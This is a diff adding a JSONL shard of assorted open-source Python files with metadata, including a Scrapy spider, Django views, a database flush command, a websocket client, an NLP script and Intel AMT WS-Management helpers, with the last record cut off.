diff --git "a/057.jsonl" "b/057.jsonl"
new file mode 100644
--- /dev/null
+++ "b/057.jsonl"
@@ -0,0 +1,483 @@
+{"seq_id": "112954021", "text": "from celery import shared_task\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_email(receive):\n\n subject = 'yes'\n message = 'really'\n from_email = 'rongjiawei1204@163.com'\n recipient_list = (receive,)\n send_mail(subject=subject, message=message,from_email=from_email,recipient_list=recipient_list)\n", "sub_path": "Code/DjangoProject/RESTEnd/sendemail/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 328, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.core.mail.send_mail", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.shared_task", "line_number": 5, "usage_type": "name"}]}
+{"seq_id": "138065892", "text": "import pandas as pd\nimport os\nimport sys\nimport argparse\n\ndef one_year_csv_writer(this_year, all_data, output):\n \"\"\"\n Writes a csv file for data from a given year.\n\n this_year --- year for which data is extracted\n all_data --- DataFrame with multi-year data\n \"\"\"\n \n # Select data for the year\n surveys_year = all_data[all_data.year == this_year]\n\n # Write the new DataFrame to a csv file\n filename = output + str(this_year) + '.csv'\n surveys_year.to_csv(filename)\n\ndef output_test(test_dir):\n \"\"\"\n Check to see if an output directory exists.\n If it exists, tell us.\n If it doesn't, create one, and tell us.\n \"\"\"\n test_split = test_dir.split('/')\n check_directory = test_split[0] + '/' + test_split[1] + '/'\n if test_split[2] in os.listdir(check_directory):\n print('Processed directory exists')\n else:\n# output_directory = '/'.join(test_split[0:-1])\n output_directory = test_split[0] + '/' + test_split[1] + '/' + test_split[2]\n print(output_directory)\n os.mkdir(output_directory)\n print('Processed directory created')\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", help = \"CSV containing data for multiple years.\")\n parser.add_argument(\"--output\", help = \"Where do you want to write output?\")\n parser.add_argument(\"--year\", help = \"Which year do you want to analyze?\")\n args = parser.parse_args()\n if args.dataset:\n surveys_df = args.dataset\n if args.output:\n test_dir = args.output\n if args.year:\n this_year = args.year\n surveys_df = pd.read_csv(surveys_df)\n output_test(test_dir)\n one_year_csv_writer(all_data = surveys_df, this_year = this_year, output = test_dir) \n print(\"Victory.\")", "sub_path": "scripts/my_first_script.py", "file_name": "my_first_script.py", "file_ext": "py", "file_size_in_byte": 1799, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "309556162", "text": "from scrapy import Request\nfrom scrapy.spiders import Spider\nfrom spider_meizitu.items import SpiderMeizituItem\nimport re\n\n\nclass MeizituSpider(Spider):\n name = 'meizitu'\n\n start_urls = {\n 'http://www.meizitu.com/a/sexy.html',\n }\n\n def parse(self, response):\n self.logger.info('Parse function called on %s', response.url)\n meizi_pic_lists = response.xpath('//ul[@class=\"wp-list clearfix\"]/li')\n for meizi_item in meizi_pic_lists:\n meizi_item_url = meizi_item.xpath('.//h3[@class=\"tit\"]/a/@href').extract()[0]\n # print('===== 当前爬取页面共有图片%s组,正在抓取第%s组图片,页面链接:: %s =====' % (len(meizi_pic_lists), i + 1, meizi_item_url))\n yield Request(meizi_item_url, callback=self.parse_meizi_pic)\n\n # next_url = re.findall('下一页', response.xpath('//*[@id=\"wp_page_numbers\"]').extract()[0])\n # if next_url:\n # # next_url = 'http://www.meizitu.com/a/' + next_url[0]\n # # print('========== Request Next Url :: %s ==========' % next_url)\n # next_url = 'http://www.meizitu.com/a/' + next_url[0]\n # yield response.follow(next_url, callback=self.parse)\n\n def parse_meizi_pic(self, response):\n self.logger.info('Parse function called on %s', response.url)\n item = SpiderMeizituItem()\n item['group'] = response.xpath(\"//div[@class='metaRight']/h2/a/text()\").extract()[0]\n meizitu_pics = response.xpath('//div[@id=\"picture\"]/p/img')\n for meizitu_pic in meizitu_pics:\n item['name'] = meizitu_pic.xpath('.//@alt').extract()[0]\n item['url'] = meizitu_pic.xpath('.//@src').extract()[0]\n # print('===== 当前页面共有图片%s张,正在抓取第%s张图片,图片链接:: %s =====' % (len(meizitu_pics), i + 1, item['image_urls']))\n yield item\n", "sub_path": "spider_meizitu/spider_meizitu/spiders/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 1904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "scrapy.spiders.Spider", "line_number": 7, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 20, "usage_type": "call"}, {"api_name": "spider_meizitu.items.SpiderMeizituItem", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "430201199", "text": "import sys\nfrom importlib import import_module\nimport click\n\nfrom orun.utils import reraise\nfrom orun.apps import apps\nfrom orun.core.management.color import no_style\nfrom orun.core.management.sql import emit_post_migrate_signal, sql_flush\nfrom orun.db import DEFAULT_DB_ALIAS, connections, transaction\n\n\n@click.command('flush')\n@click.option('--database', '-db')\n@click.option('--verbosity', '-v')\n@click.option('--interactive', '-i')\n@click.option('--reset-sequences', '-r')\n@click.option('--allow-cascade', '-c')\n@click.option('--inhibit-post-migrate', '-ipm')\ndef command(database, verbosity, interactive, reset_sequences, allow_cascade, inhibit_post_migrate):\n connection = connections[database]\n\n style = no_style()\n\n # Import the 'management' module within each installed app, to register\n # dispatcher events.\n for app_config in apps.get_app_configs():\n try:\n import_module('.management', app_config.name)\n except ImportError:\n pass\n\n sql_list = sql_flush(style, connection, only_orun=True,\n reset_sequences=reset_sequences,\n allow_cascade=allow_cascade)\n\n if interactive:\n confirm = input(\"\"\"You have requested a flush of the database.\nThis will IRREVERSIBLY DESTROY all data currently in the %r database,\nand return each table to an empty state.\nAre you sure you want to do this?\n\nType 'yes' to continue, or 'no' to cancel: \"\"\" % connection.settings_dict['NAME'])\n else:\n confirm = 'yes'\n\n if confirm == 'yes':\n try:\n with transaction.atomic(using=database,\n savepoint=connection.features.can_rollback_ddl):\n with connection.cursor() as cursor:\n for sql in sql_list:\n cursor.execute(sql)\n except Exception as e:\n new_msg = (\n \"Database %s couldn't be flushed. Possible reasons:\\n\"\n \" * The database isn't running or isn't configured correctly.\\n\"\n \" * At least one of the expected database tables doesn't exist.\\n\"\n \" * The SQL was invalid.\\n\"\n \"Hint: Look at the output of 'orun-admin sqlflush'. \"\n \"That's the SQL this command wasn't able to run.\\n\"\n \"The full error: %s\") % (connection.settings_dict['NAME'], e)\n reraise(click.UsageError, click.UsageError(new_msg), sys.exc_info()[2])\n\n # Empty sql_list may signify an empty database and post_migrate would then crash\n if sql_list and not inhibit_post_migrate:\n # Emit the post migrate signal. This allows individual applications to\n # respond as if the database had been migrated from scratch.\n emit_post_migrate_signal(verbosity, interactive, database)\n else:\n click.echo(\"Flush cancelled.\")\n", "sub_path": "orun/core/management/commands/flush.py", "file_name": "flush.py", "file_ext": "py", "file_size_in_byte": 2913, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "orun.db.connections", "line_number": 20, "usage_type": "name"}, {"api_name": "orun.core.management.color.no_style", "line_number": 22, "usage_type": "call"}, {"api_name": "orun.apps.apps.get_app_configs", "line_number": 26, "usage_type": "call"}, {"api_name": "orun.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "importlib.import_module", "line_number": 28, "usage_type": "call"}, {"api_name": "orun.core.management.sql.sql_flush", "line_number": 32, "usage_type": "call"}, {"api_name": "orun.utils.reraise", "line_number": 62, "usage_type": "call"}, {"api_name": "click.UsageError", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 62, "usage_type": "call"}, {"api_name": "orun.core.management.sql.emit_post_migrate_signal", "line_number": 68, "usage_type": "call"}, {"api_name": "click.command", "line_number": 12, "usage_type": "call"}, {"api_name": "click.option", "line_number": 13, "usage_type": "call"}, {"api_name": "click.option", "line_number": 14, "usage_type": "call"}, {"api_name": "click.option", "line_number": 15, "usage_type": "call"}, {"api_name": "click.option", "line_number": 16, "usage_type": "call"}, {"api_name": "click.option", "line_number": 17, "usage_type": "call"}, {"api_name": "click.option", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "569252916", "text": "# Copyright 2019-2021 Wingify Software Pvt. Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Module for making requests, uses requests internally \"\"\"\n\nimport requests\n\n\nclass Connection:\n \"\"\" Connection class to provide SDK with network connectivity interfaces \"\"\"\n\n def __init__(self):\n \"\"\" Initializes connection class with requests session object\"\"\"\n self.session = requests.Session()\n\n def get(self, url, params=None):\n \"\"\" Get method, it wraps upon requests' get method.\n Args:\n url (str): Unique resource locator\n params (dict): Parameters to be passed\n Returns:\n dict : Status code and Response text\n \"\"\"\n try:\n resp = self.session.get(url, params=params)\n return {\"status_code\": resp.status_code, \"text\": resp.text}\n except Exception:\n return {\"status_code\": None, \"text\": \"\"}\n\n def post(self, url, params=None, data=None, headers=None):\n \"\"\" Post method, it wraps upon requests' post method.\n Args:\n url (str): Unique resource locator\n params (dict): Parameters to be passed\n data (dict): Json data to be passed\n headers (dict): Headers for request\n Returns:\n dict : Status code and Response text\n \"\"\"\n try:\n resp = self.session.post(url, params=params, json=data, headers=headers)\n\n return {\"status_code\": resp.status_code, \"text\": resp.text}\n except Exception:\n return {\"status_code\": None, \"text\": \"\"}\n", "sub_path": "vwo/http/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 2084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.Session", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "370914691", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.models import User\n\nfrom .models import Post, Category\nfrom .forms import CatTransferForm\n\n\ndef category(request, slug=None):\n if slug:\n instance = get_object_or_404(Category, slug=slug)\n all_posts = Post.published_objects.filter(category=instance)\n else:\n instance = None\n all_posts = Post.published_objects.all()\n\n ctx = {'category': instance, 'posts': all_posts}\n return render(request, 'category.html', ctx)\n\n\ndef post(request, year, month, slug):\n article = get_object_or_404(Post, publish__year=year,\n publish__month=month, slug=slug)\n ctx = {'article': article}\n return render(request, 'article.html', ctx)\n\n\ndef user_posts(request, userid):\n user = get_object_or_404(User, id=userid)\n all_posts = Post.objects.filter(author=user, publish__isnull=False)\n\n ctx = {'author': user, 'posts': all_posts}\n return render(request, 'category.html', ctx)\n\n\n@staff_member_required\ndef transfer_posts_tool(request):\n if request.method == 'POST':\n form = CatTransferForm(request.POST)\n if form.is_valid():\n Post.objects.filter(category__in=form.cleaned_data['from_cats']).update(\n category=form.cleaned_data['to_cat'])\n\n else:\n form = CatTransferForm()\n\n ctx = {\n 'form': form,\n }\n return render(request, 'transfer_tool.html', ctx)\n", "sub_path": "mtlpy/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 11, "usage_type": "argument"}, {"api_name": "models.Post.published_objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Post.published_objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.published_objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.published_objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 29, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.CatTransferForm", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 41, "usage_type": "name"}, {"api_name": "forms.CatTransferForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.admin.views.decorators.staff_member_required", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "61859599", "text": "from websocket import WebSocketApp\r\nfrom threading import Thread\r\nimport json\r\nimport time\r\n\r\ndef on_message(ws, msg):\r\n msg = json.loads(msg.decode('utf-8'))\r\n print(msg)\r\n\r\ndef on_error(ws, msg):\r\n print(msg)\r\n\r\ndef on_close(ws):\r\n print('close')\r\n\r\ndef on_open(ws):\r\n def run(*args):\r\n request = '[{\"ticket\":\"\"},{\"type\":\"ticker\",\"codes\":[\"KRW-BTC\"]}]'\r\n ws.send(request)\r\n time.sleep(5)\r\n ws.close()\r\n\r\n th = Thread(target=run, daemon=True)\r\n th.start()\r\n\r\nif __name__ == \"__main__\":\r\n ws = WebSocketApp(\"wss://api.upbit.com/websocket/v1\",\r\n on_message=on_message,\r\n on_error=on_error,\r\n on_close=on_close,\r\n on_open=on_open)\r\n ws.run_forever()", "sub_path": "coin/upbit_ws.py", "file_name": "upbit_ws.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 23, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "13952149", "text": "from nltk import *\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\nfrom stop_words import get_stop_words\nfrom nltk.stem.porter import PorterStemmer\nfrom gensim import corpora, models\nimport gensim\nimport math\nimport PyPDF2\nimport timeit\nimport spacy\n\nnlp = spacy.load('en')\n\n# Initiate List for NER\nORG = []\nPERSON = []\nGPE_LOCATION = []\nMONEY = []\nTIME = []\nEVENT = []\nOTHER = []\n\nquestion_list = []\ntext = \"\"\"\nBertie Steffink, nephew of the aforementioned Luke, had early in life adopted the profession of\nne'er-do-weel; his father had been something of the kind before him. At the age of eighteen Bertie \nhad commenced that round of visits to our Colonial possessions, so seemly and desirable in the case \nof a Prince of the Blood, so suggestive of insincerity in a young man of the middle-class.\"\"\"\n\n# Replace the tokens to exclude the NER tokens\n# Not including the NER taggings in tokenization\n\n# SYSTEM CODE\n# PREPROCESSING\ntokenized_lda = word_tokenize(text)\n\n# Tokenized by sentence for LDA\nlda_sentence_tokens = []\nsentence = \"\"\ni = 0\nfor word in tokenized_lda:\n sentence += \" \" + word\n if (word == '.'):\n lda_sentence_tokens.append(sentence)\n # printing every sentence in a text\n sentence = \"\"\n\n# LDA\n# Preprocess\ntokenizer = RegexpTokenizer(r'\\w+')\n\n# create English stop words list\nen_stop = get_stop_words('english')\n\n# Create p_stemmer of class PorterStemmer\np_stemmer = PorterStemmer()\n\n# compile sample documents into a list\ndoc_set = lda_sentence_tokens\n\n# list for tokenized documents in loop\ntexts = []\n\n# loop through document list\nfor i in doc_set:\n # clean and tokenize document string\n doc = nlp(i)\n\n for ent in doc.ents:\n if ent.label_ == 'ORG':\n ORG.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'PERSON':\n PERSON.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'GPE':\n GPE_LOCATION.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'MONEY':\n MONEY.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'TIME':\n TIME.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'EVENT':\n EVENT.append(ent.text)\n print(ent.text, ent.label_)\n else:\n OTHER.append(ent.text)\n print(ent.text, ent.label_)\n\nNER = ORG + PERSON + GPE_LOCATION + MONEY + TIME + EVENT + OTHER\nif \" \" in NER:\n NER.remove(\" \")\nprint(NER)\n\nfor word in NER:\n\n for sentence in doc_set:\n\n if \"________\" in sentence:\n break\n elif word in sentence:\n question_list.append(sentence.replace(word, \"________\"))\nindex = 1\nfor question in question_list:\n print(str(index) + \"] \" +question)\n index += 1\n\"\"\"\nfor token in range(len(NER)):\n if NER[token] in i:\n i = i.replace(NER[token], \" tags\" + str(token) + \" \")\n\n raw = i.lower()\n tokens = tokenizer.tokenize(raw)\n\n for word in range(len(tokens)):\n for token in range(len(NER)):\n if tokens[word] == (\" tags\" + str(token) + \" \"):\n tokens[word] = NER[token]\n\n # remove stop words from tokens\n stopped_tokens = [i for i in tokens if not i in en_stop]\n\n # add tokens to list\n texts.append(stopped_tokens)\n\n# turn our tokenized documents into a id <-> term dictionary\ndictionary = corpora.Dictionary(texts)\n\n# convert tokenized documents into a document-term matrix\ncorpus = [dictionary.doc2bow(text) for text in texts]\n\n# generate LDA model\nldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=5, id2word=dictionary, passes=20)\nlda_raw = ldamodel.print_topics(num_topics=2, num_words=100)\n\ntry:\n # Preprocessing\n # Gathering each words in LDA\n\n nstr = re.sub(r'[+|\"\"|,|\\\\|'']', r'', str(lda_raw[1]))\n tokens = word_tokenize(nstr)\n\n lda_tokens = []\n for i in tokens:\n lda_tokens.append(str(i).split('*'))\n\n lda_words = []\n index = 0\n for i in lda_tokens:\n if index >= 2 and index < len(lda_tokens) - 2:\n lda_words.append(i[1])\n index += 1\n\n\n # Part-of-Speech Tagging in Templating is divided into two.\n # The POS tagging from LDA to filter out the topic in the corpora and the Original Copy which is the template that\n # change the\nexcept IndexError:\n print(\"Error Occur\")\n\n# from LDA\nlda_tagging = pos_tag(lda_words)\nprint(lda_tagging)\n\"\"\"", "sub_path": "LDA.py", "file_name": "LDA.py", "file_ext": "py", "file_size_in_byte": 4521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spacy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.tokenize.RegexpTokenizer", "line_number": 51, "usage_type": "call"}, {"api_name": "stop_words.get_stop_words", "line_number": 54, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "401425513", "text": "#!/usr/bin/env python3\n# -*- encoding=utf-8 -*-\n\n# description:\n# author:jack\n# create_time: 2018/1/3\n\n\"\"\"\n desc:pass\n\"\"\"\nimport os\nimport logging\nimport traceback\nfrom dueros.Bot import Bot\nfrom dueros.card.TextCard import TextCard\nfrom dueros.card.ImageCard import ImageCard\nfrom dueros.card.StandardCard import StandardCard\nfrom dueros.samples.xichuangzhu.Poem import Poem\nfrom dueros.directive.BaseDirective import BaseDirective\nimport json\nimport random\n\nclass Bot(Bot):\n def launchRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def nextIntentRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def previousIntentRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def seemoreIntentRequest(self):\n title = \"\"\n try:\n anchorText = (self._request.data[\"context\"][\"Screen\"][\"card\"][\"anchorText\"])\n except Exception as e:\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n base_directive = BaseDirective(\"Display.RenderSwanView\")\n poem_see_more = \"\"\n try:\n poem_see_more = Poem.get_see_more(gushiwen_url=anchorText)\n except Exception as e:\n traceback.print_exc()\n if poem_see_more:\n logging.info('poem_see_more:' + json.dumps(poem_see_more))\n standardCard = self.get_one_poem_standardCard()\n standardCard.data[\"title\"] = poem_see_more[\"chuzi\"]\n standardCard.data[\"content\"] = poem_see_more[\"text\"] + \"\\n\\n\" + poem_see_more[\"yiwen\"]\n standardCard.data[\"image\"] = Poem.get_one_random_image()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % (poem_see_more[\"text\"])\n }\n else:\n return {\n 'outputSpeech': ' 抱歉, 未找到这首诗 '\n }\n\n def get_one_poem_standardCard(self):\n standardCard = StandardCard()\n one_poem_item = Poem.get_one_poem_item()\n standardCard.data[\"title\"] = one_poem_item[\"chuzi\"]\n standardCard.data[\"content\"] = one_poem_item[\"mingju\"]\n standardCard.data['anchorText'] = one_poem_item[\"url\"]\n standardCard.data[\"image\"] = Poem.get_one_random_image()\n return standardCard\n\n def __init__(self, data):\n super(Bot, self).__init__(data)\n\n self.add_launch_handler(self.launchRequest)\n\n self.add_intent_handler('ai.dueros.common.next_intent', self.nextIntentRequest)\n\n self.add_intent_handler('ai.dueros.common.previous_intent', self.previousIntentRequest)\n\n self.add_intent_handler('xichuangzhu----see_more_about_it', self.seemoreIntentRequest)\n \n\n pass\n\n\nif __name__ == '__main__':\n pass\n", "sub_path": "dueros/samples/xichuangzhu/Bot.py", "file_name": "Bot.py", "file_ext": "py", "file_size_in_byte": 3372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dueros.directive.BaseDirective.BaseDirective", "line_number": 55, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_see_more", "line_number": 58, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 58, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 62, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_random_image", "line_number": 66, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 66, "usage_type": "name"}, {"api_name": "dueros.card.StandardCard.StandardCard", "line_number": 77, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_poem_item", "line_number": 78, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 78, "usage_type": "name"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_random_image", "line_number": 82, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 82, "usage_type": "name"}]}
+{"seq_id": "342886924", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nCommon functionalities for AMT Driver\n\"\"\"\nimport logging\nimport pywsman\nimport xmltodict\nfrom ast import literal_eval\nfrom xml.etree import ElementTree\nfrom wry import data_structures\nfrom wry import exceptions\nfrom wry.decorators import retry, add_client_options\nfrom wry.config import RESOURCE_URIs\nfrom wry.data_structures import _strip_namespace_prefixes, WryDict\n\n\n\n_SOAP_ENVELOPE = 'http://www.w3.org/2003/05/soap-envelope'\n\nLOG = logging.getLogger(__name__)\n\nAMT_PROTOCOL_PORT_MAP = {\n 'http': 16992,\n 'https': 16993,\n}\n\n\ndef _validate(doc, silent=False):\n if doc is None:\n raise exceptions.AMTConnectFailure\n if not silent:\n if doc.is_fault():\n raise exceptions.WSManFault(doc)\n return doc\n\n\n@add_client_options\n@retry\ndef wsman_get(client, resource_uri, options=None, silent=False):\n '''Get target server info'''\n doc = client.get(options, resource_uri)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_pull(client, resource_uri, options=None, wsman_filter=None, context=None, silent=False):\n '''Get target server info'''\n doc = client.pull(options, wsman_filter, resource_uri, context)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_enumerate(client, resource_uri, options=None, wsman_filter=None, silent=False):\n '''Get target server info'''\n doc = client.enumerate(options, wsman_filter, resource_uri)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_put(client, resource_uri, data, options=None, silent=False):\n '''Invoke method on target server\n :param silent: Ignore WSMan errors, and return the document anyway. Does not\n ignore the endpoint being down.\n '''\n doc = client.put(options, resource_uri, str(data), len(data))\n return _validate(doc, silent=silent)\n\n@add_client_options\n@retry\ndef wsman_invoke(client, resource_uri, method, data=None, options=None, silent=False):\n '''Invoke method on target server.'''\n doc = client.invoke(options, resource_uri, str(method), pywsman.create_doc_from_string(str(data)))\n return _validate(doc, silent=silent)\n\n\ndef get_resource(client, resource_name, options=None):\n '''\n '''\n uri = RESOURCE_URIs[resource_name]\n doc = wsman_get(client, uri, options=options)\n return WryDict(doc)\n \n\ndef enumerate_resource(client, resource_name, wsman_filter=None, options=None):\n '''\n class.\n '''\n uri = RESOURCE_URIs[resource_name]\n doc = wsman_enumerate(client, uri, options=options) # Add in relevant kwargs... filter?\n doc = WryDict(doc)\n context = doc['EnumerateResponse']['EnumerationContext']\n ended = False\n output = {resource_name: []}\n while ended is False:\n doc = wsman_pull(client, uri, context=str(context), options=options)\n response = WryDict(doc)['PullResponse']\n ended = response.pop('EndOfSequence', False)\n output[resource_name].append(response['Items'][resource_name])\n return output\n\n\ndef put_resource(client, indict, options=None, uri=None, silent=False):\n '''\n Given a dict or describing a wsman resource, post this resource to the client.\n :returns: data_structures.WryDict\n :param indict: A dictionary or dictionary-like object (eg.\n common.RESOURCE_URIs.\n :param uri: If a mapping does not exist in common.RESOURCE_URIs, the resource URI can be specified manually here.\n :param mappings: A dictionary providing extra mappings between resource names and URIs.\n '''\n if not uri:\n uri = RESOURCE_URIs[indict.keys()[0]] # Possible to support multiple simply here?\n data = indict.as_xml()\n doc = wsman_put(client, uri, data, options=options, silent=silent)\n return WryDict(doc)\n\n\ndef invoke_method(client, method, input_dict, options=None):\n resource_name = input_dict.keys()[0]\n input_dict = WryDict(input_dict).with_namespaces()\n data = input_dict[resource_name]\n uri = data.pop(u'@xmlns')\n data.values()[0][u'@xmlns'] = uri\n xml = xmltodict.unparse(data, full_document=False, pretty=True)\n doc = wsman_invoke(client, RESOURCE_URIs[resource_name], method, xml, options=options)\n returned = WryDict(doc)\n return_value = returned[returned.keys()[0]]['ReturnValue']\n if return_value != 0:\n raise exceptions.NonZeroReturn(return_value)\n return returned\n\n", "sub_path": "wry/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 4906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "wry.exceptions.AMTConnectFailure", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wry.exceptions", "line_number": 41, "usage_type": "name"}, {"api_name": "wry.exceptions.WSManFault", "line_number": 44, "usage_type": "call"}, {"api_name": "wry.exceptions", "line_number": 44, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 48, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 49, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 56, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 57, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 64, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 65, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 72, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 73, "usage_type": "name"}, {"api_name": "pywsman.create_doc_from_string", "line_number": 86, "usage_type": "call"}, {"api_name": "wry.decorators.add_client_options", "line_number": 82, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 83, "usage_type": "name"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 93, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 95, "usage_type": "call"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 102, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 104, "usage_type": 